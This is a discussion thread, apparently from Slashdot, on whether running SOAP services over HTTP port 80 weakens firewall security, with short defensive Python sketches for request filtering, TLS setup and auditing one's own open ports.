You could even have it so that there's some hazard to those right there in reception but breaking out of reception is as hard as breaking in any other way. But you don't just assume it's secure because it's nicely decorated or (in this case) because so many people walk through receptions it *must* be secure.
It's just a security model. If you alter the constraints and facilities of the environment, then you've also changed the range of threats to that environment. And you tailor the prophylactic security, intrusion detection and response to the potential threats and damage of compromise.
Overall, if you want to have any security, you have to think about security. However the hell you set up your systems.
A positive note.. (Score:4, Interesting)
Now of course, this does apply only to SOAP over HTTP, and possibly not SMTP/POP3, Raw socket, MSMQ, etc..etc..
Cryptogram (Score:2)
SOAP requests *can* be filtered (Score:4, Informative)
I agree there is still a major lack of support for this type of filtering, and even the standard leaves something to be desired in this respect, but the SOAP designers definitely did think that this was a big enough problem to provide facilities for future closing of these holes.
It's a bit of a pain to administer, but it definitely *can* be done.
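For instance, SOAP 1.1's HTTP binding requires a SOAPAction header on every request, precisely so an intermediary can filter without parsing the body. A Python sketch of what such a gateway check might look like; the action URIs in the allow-list are made up:

```python
# Hypothetical allow-list of SOAPAction values the gateway will forward.
ALLOWED_ACTIONS = {
    "urn:stockquote#GetLastTradePrice",
    "urn:stockquote#GetQuoteHistory",
}

def may_forward(headers: dict) -> bool:
    """Decide from the HTTP headers alone whether a SOAP request may
    reach the backend; anything not explicitly listed is denied."""
    action = headers.get("SOAPAction", "").strip('"')
    return action in ALLOWED_ACTIONS
```

Note the default-deny stance: a request with no SOAPAction at all is dropped, not forwarded.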
Non issue (Score:2)
Layer 7 firewalling (Score:2)
Yes, another port would be simpler to secure. Without that, firewall administrators will simply go higher in the stack and look at layer 7. In other words, the firewall will have to pick out the URL and apply rules to that. Of course, this also implies the firewall is tracking connections, etc. It can no longer be just a dumb packet filter, but no serious firewall is.
In the end, the lack of a port as a service differentiator isn't a big deal. What is important is that you have something which differentiates the service. A URL can do that, it just costs a little more CPU.
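A toy version of such a layer-7 rule table in Python; the paths are invented, and a real firewall would implement this inside its proxy engine:

```python
import re

# Ordered rule table: first match wins, default deny.
RULES = [
    (re.compile(r"^/soap/stockquote$"), "allow"),  # the one published service
    (re.compile(r"^/soap/"), "deny"),              # any other SOAP endpoint
    (re.compile(r"^/"), "allow"),                  # ordinary web pages
]

def verdict(path: str) -> str:
    """Apply the URL rules, in order, to a request path."""
    for pattern, action in RULES:
        if pattern.match(path):
            return action
    return "deny"
```

This is exactly the port-number game moved up the stack: the URL plays the role the port used to.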
Firewalls will have to become heuristic (Score:4, Insightful)
I wonder if anyone is working on this?
More appropriate question? (Score:2, Interesting)
Having done sys admin work, it's much easier and less work to go through port 80. That's one less port to keep track of and allows me to build expertise on securing HTTP. Learning to secure a lot of different ports isn't hard, though it is time consuming. Teaching it to new staff and making sure they understand all of it is another matter. That's one reason for the adoption of SOAP and other XML/HTTP protocols.
From a developer perspective, would you rather build in IPSec to your IIOP, CORBA application, or setup HTTPS and go through a well tested system? Rolling your own security on top of IIOP and CORBA isn't a trivial task. You could build your own encryption wrapper for IIOP or CORBA, but you would have to handle all the key storage, key management, encryp/decrypt, secure sessions, and authentication to create robust, reliable security.
If your application really needs greater than 128-bit SSL, then going through a web server on port 80 doesn't do anything for you. To my knowledge RMI can make HTTP connections via java.rmi.server.RMISocketFactory. There are existing Java libs to handle both SSL and key management, so going with port 80 is really an administration choice.
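By way of contrast, here is roughly what "going through a well tested system" costs the developer today, sketched with Python's standard library; the `ca_file` argument is a hypothetical path to the CA bundle that signed the service's certificate:

```python
import ssl

def make_client_context(ca_file=None):
    """Build a TLS client context from the standard library, rather
    than hand-rolling key management and encryption over IIOP."""
    ctx = ssl.create_default_context(cafile=ca_file)
    ctx.check_hostname = True            # verify the server's identity
    ctx.verify_mode = ssl.CERT_REQUIRED  # reject unauthenticated peers
    return ctx
```

Key storage, session setup, and authentication all ride on infrastructure that has already been beaten on by thousands of deployments.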
I asked MS the same question at PDC 2000 (Score:3, Informative)
Their response?
Developers are tired of being hampered by netadmins when trying to open up insecure ports just so that DCOM will work. Basically, SOAP is a way to do it where you don't have to open up esoteric and undocumented ports and protocols...
As far as security goes... it's up to the implementors. SOAP does have one advantage over some other forms of RPC, in that it has a few built in forms of authentication and is explicit as opposed to implicit. That means you can't just randomly activate bits of code just because you can log onto a server.
Another advantage of SOAP is that a decent XML coder can write his own parser for the protocol, so you don't have to use the vendor's, and you can customize your parser to only pass safe requests.
Of course, some of the MS people indicated that they felt I should use the MS parser at this point. I haven't seen anything bad with it, but I wouldn't have any qualms about writing my own if the business needs dictated it...
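A sketch of the "only pass safe requests" idea using Python's standard XML parser; the method whitelist is illustrative:

```python
import xml.etree.ElementTree as ET

SOAP_ENV = "{http://schemas.xmlsoap.org/soap/envelope/}"

# Illustrative whitelist of request methods we are willing to dispatch.
SAFE_METHODS = {"GetLastTradePrice"}

def accept_method(envelope_xml: str) -> str:
    """Parse a SOAP envelope and return the requested method name,
    raising if the envelope is malformed or the method isn't allowed."""
    root = ET.fromstring(envelope_xml)
    body = root.find(SOAP_ENV + "Body")
    if body is None or len(body) == 0:
        raise ValueError("no SOAP Body")
    method = body[0].tag.split("}")[-1]  # strip the XML namespace
    if method not in SAFE_METHODS:
        raise ValueError("method not allowed: " + method)
    return method
```

Because the envelope is parsed before dispatch, an unknown method never touches application code.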
SOAP is designed to combat security (Score:5, Informative)
SOAP is designed with security in mind. Security circumvention.
Re:SOAP is designed to combat security (Score:2, Insightful)
I think that is this article's most insightful comment so far. Cf. also the comment above where Bruce Schneier points this out.
Steven Deering and the IETF (Score:2, Insightful)
Bruce Schneier on SOAP (Score:4, Interesting)
http://www.counterpane.com/crypto-gram-0006
You should try running an ASP. (Score:5, Informative)
We need to fire up a java applet on the client machine that maintains a session with the server. We also need to allow chat.
I can't begin to tell you how many millions of dollars we've lost as a company because of large corporations that refuse to adjust their firewall settings to accommodate web applications.
Some of them don't want
If we're only allowed traffic on port 80, which is the case when dealing with 90% of corporate environments, your choice is either a) get the services running over port 80 or b) give up on maintaining your business.
web services security as an emerging market (Score:3, Insightful)
To date, there have been a large number of tools dedicated to the creation and deployment of web services, but relatively little thought has been given to relationship management between services (a subset of which is security). Only a handful of companies (e.g., the deftly-named Grand Central [grandcentral.com] and Flamenco [flamenconetworks.com]) have started to broach this issue.
I think we can expect to see a large amount of activity in the area of what it takes to connect web services in the real world (i.e., with sensitive data, in business-critical operations, etc.) in the near future. One certainly would not want one's web services to be abused [langa.com]/cracked [wired.com] as easily as Microsoft's Passport "technology". It will be interesting to see how this new market evolves.
Don't forget the reality of the customer! (Score:2, Insightful)
This is true for both consumers and business customers.
So while you might want to run a service or application on another port, you might be locked into port 80.
Just something to keep in mind.
Besides, you shouldn't rely on obscure ports for your security. You should build security into your application from the start. And you should NEVER trust any data that comes from "outside" your applications.
Cheers!
Why do we even need ports in the first place? (Score:3, Insightful)
I would say that drilling open a bunch of ports on a firewall is probably safer than opening port 80 and nothing else and running all services through that one port. Why do you suppose we have ports in the first place? If everything were supposed to run on just one port, then we should have just an IP address and no ports at all! But we do have ports, 64K of them.
In my opinion, every "server" program running on a computer should have its own dedicated ports which it listens on and performs operations through. For secure operation, you decide which services you need and enable only those services. Since all ports not used by these services are, well, not used, then you should block those ports in your firewall.
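Auditing that stance is simple enough to script. A crude Python sketch (the host and port range are whatever you want to check; a real audit would use a proper scanner):

```python
import socket

def port_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Crude liveness check: can we complete a TCP connect to host:port?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def audit(host, expected_ports, scan_range):
    """Return ports that are listening but NOT on the expected list --
    each one is either a forgotten service or a surprise."""
    return [p for p in scan_range
            if p not in expected_ports and port_open(host, p)]
```

If `audit` returns anything, something is running that your firewall policy doesn't know about.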
Want more security? Most non-computer people simply don't understand the concept of good computer maintenance. I keep telling people that just like any machine, computers need to be well maintained or their operation degrades over time. (And that means that security vulnerabilities become more likely as time goes by without proper maintenance.) This includes software and hardware maintenance. Once you have a well-functioning system, you can search for big security vulnerabilities, like unnecessary programs or whatever. Once those are gone, you look for smaller things, like software configuration that might allow an intruder to get increased privileges. Once those are gone, you can go deeper, by getting some h4x0r programs and torture testing your system (being careful not to mess up other peoples' systems in the process). Once you can't get into your own system, you can go deeper yet by examining and auditing the source code of programs you're running (if the source is available to you). I'm sure there are about 30 other steps in between these, but these four are the big tick-marks I can think of right now. Oh well.
"Web RPCs Considered Harmful" (Score:2, Informative)
Summary (and using more recent terminology): Web services that expose more new and unique code are more likely to expose bugs. RPCs, SOAP, and CGIs all encourage developers to write more exposed code by making that style easier to do.
One better alternative is to be more data-driven (some would say "functional", as in "functional programming"), so that you only expose data (via a standard server which would typically be more mature, heavily reviewed code).
Alas, that's an entirely different way of thinking that most people are not used to, since it flies in the face of "normal procedural or OO programming" that happens on the desktop. Some examples, though, are Linda Systems (TupleSpaces), REST [conveyor.com] (the traditional WWW architecture), and even P2P to a large extent.
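A toy contrast in Python: in the data-driven style the exposed surface is a lookup keyed by URL, not a caller-chosen procedure. The quote table is fabricated for the example:

```python
# Fabricated data store standing in for whatever backs the service.
QUOTES = {"IBM": 104.42, "RHAT": 7.13}

def handle_get(path: str):
    """REST-style dispatch: GET /quotes/<symbol> selects data. No
    caller-supplied operation name ever reaches application code."""
    parts = path.strip("/").split("/")
    if len(parts) == 2 and parts[0] == "quotes" and parts[1] in QUOTES:
        return 200, QUOTES[parts[1]]
    return 404, None
```

The attack surface collapses to "which resources exist", which a mature, heavily reviewed server can enforce, instead of "which procedures can be invoked with which arguments".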
debate summary (Score:2)
I will now summarize this entire article into two opposing viewpoints:
I tend to agree with the second argument, but until we have powerful stateful protocol filters for all protocols that could go through port 80 or wherever, there's no real difference between opening 50 separate holes or one big one. Even then, bad stuff can get in and out over https, etc. So SOAP doesn't really make things much worse, it just points out security issues that we've been ignoring all along.
The Real Reason ... (Score:3, Insightful)
Hence SOAP. You piggyback your ActiveX control onto another service (HTTP) that uses a single port. Smart admins will use something other than port 80; we know how many of *those* there are.
There is also the problem that firewall admins tend to take their job seriously -- they know that if anything nasty gets into the network, they'll get blamed for it. They tend to be *very* conservative. Web admins don't -- most of them think that the worst that can happen if they get hacked is that they'll get pitchers of nekkid wimmen on the corporate homepage. They don't care. *Much* easier to deal with web admins than firewall admins. Lotsa places will even let you have your own web server if you promise to be nice.
As to what it can lead to, check out RFC 3093, Firewall Enhancement Protocol (FEP) [isi.edu]
Firewalls are lame anyway (Score:2, Insightful)
There are so many ways around most firewalls (modems, wireless networks, unscrupulous visitors, viruses on removable media and whatnot) that the firewall is really just the "front door."
End-to-end security -- defense in depth -- is the only way to be sure. Each machine has to be "strong enough" -- just like most office desks and doors are equipped with locks, though most of us don't use 'em.
Clearly we live in a world where most desktops are _completely_ insecure, so firewalls aren't completely worthless. But perhaps SOAP and the like will have some benefit through clueing in some of the clueless that there's more to security than throwing up a firewall.
Good Security = Good Policies & Practices (Score:2, Insightful)
The problem is that certain things have to be open on a networked computer in order to benefit from the networking in the first place. You need layered security. You can't just secure your physical, network and transport layers and expect everything to be okay. You need to know what's going on all the way up to the application layer.
You need to use DMZs, staggered firewalls, SSL, SSH, applications that force you to login, appropriate file/directory/service security permissions. You need to know at any time what software your boxes are running, and make an effort to understand how that software works and what issues it presents. You need to patch commercial software, read the bug lists and do penetration testing.
There's obviously more that can be added to this list, but the point is that security is a process, not a technical specification, a device...or a choice of port.
Most organizations don't invest enough in this process because those controlling expenditure tend not to understand the importance. Also, security is one of those things you only notice when it doesn't work, so it is assumed you are doing it, and you'll never shine for doing a great job at it.
I think it will take a much more hostile Internet security environment to wake people up to the need to invest in the most critical security capital of all: talented, educated and dedicated human beings.
XML=impedance mismatch=bugs=holes (Score:2, Interesting)
XML may be a "standard" but so are technologies such as Java serialisation and they work just fine over HTTP. This works automatically and leads to fewer programming errors due to "impedance mismatch", surely the chief source of any security holes and other bugs.
I don't buy the argument that an XML schema is any more future-proof than a Java class spec. Java handles class changes etc. quite elegantly. And I don't buy the "XML is language-independent" line either - it's just hard to read XML in any language. So you have to use that awful Xerces stuff that changes every 2 months, with little backward compatibility between versions.
Don't be fooled - there is simply nothing that uses XML that can't be done more elegantly some other way. XML is not a technology - it, along with SOAP, is a completely pointless standard.
Apache is the new inetd (Score:5, Interesting)
A couple of rebuttals if I may.
Many people claim that one can run services on any port they choose, so port filtering is not the same thing as service filtering. True, but if people ran anything on any port we would have no concept of well-known-services at specific ports. Moving web traffic from port 80 makes almost no sense because that's where everyone is going to look for it by default. There is a high probability, then, that filtering on specific ports will filter specific services.
Network administrators, by default, are highly suspicious and paranoid people. They don't even trust the people they work with, and for good reason. If they could force everyone to use pine or mutt for e-mail reading, I'm sure they would, since those are less susceptible to Outlook-borne viruses. If development teams would communicate with and seek advice from the security team when developing applications, I'm sure there wouldn't be as much hostility to opening a port as there is when approached with "We just wrote an application. Can we have a free port?"[1]. In the latter case, the security team has no idea what the application does or how it was developed and is certainly not inclined to open a port to untrusted software.
Finally, on to the subject of my article, Apache (or whatever server you're running) is the inetd of the future. Look at the facts:
Paradoxically, network admins appear less paranoid about their web servers than other inetd-based or standalone services. Some guy codes up a web app and, with little fuss, gets it deployed on the server. No code review, no hassle, no problem! There are only two reasons I can think of for this behavior: 1) The administrator inherently trusts the web server, or 2) the web server box is in a DMZ. I would be suspicious of administrators in the former case.
Despite the security advantages of a DMZ, it is still necessary for application developers to communicate with security people. Say, for example, that a web application is deployed on a server in a DMZ and that the machine is later compromised. If the application had a configuration file with passwords for a database, the database should now be considered compromised. Damage can be reduced or prevented by correct configuration of the database (providing write access only to a specific table rather than the whole database), but you should check with the security people before actual deployment.[2]
[1] The standard answer to this question is "No". Note that the administrator only answers the question asked. If you want to be more successful in the future, present a full document detailing what the software does, how it works, and maybe provide the admin with a code review, THEN ask for a port. I know this is a lot of work, but it is necessary to maintain the security of the network. You may not take security seriously, but your administrator does.
[2] Yes, I know that there are moron security people out there. My comment assumes you have good to excellent security people working in your company.
Security policy MUST enable business, not inhibit (Score:3, Insightful)
It's not about the connection method, it's the content that traverses the corporate boundary that is the issue.
If the content shouldn't be going over the boundary, then it doesn't matter how you achieved it - you're still in the wrong. You could do it in CORBA, you could do it in simple HTTP GET and POSTs, it doesn't matter.
As a developer, I can make SOAP invisible to all firewall administrators by using HTTPS or by abusing their firewall's limitations (most firewalls are incredibly stupid - they don't and can't parse even basic protocols like HTTP, and thus let anything out on port X if port X is allowed outbound).
As a person responsible for security, your use of any services not explicitly allowed is probably against security policy. But security policy is there to enable business, not inhibit it. This is the single biggest failing of most security people: they lose sight of why they are there!
If it takes too long to get a content-flow approved, then that is a failing of the content-flow negotiation process, and it's not about technology at all.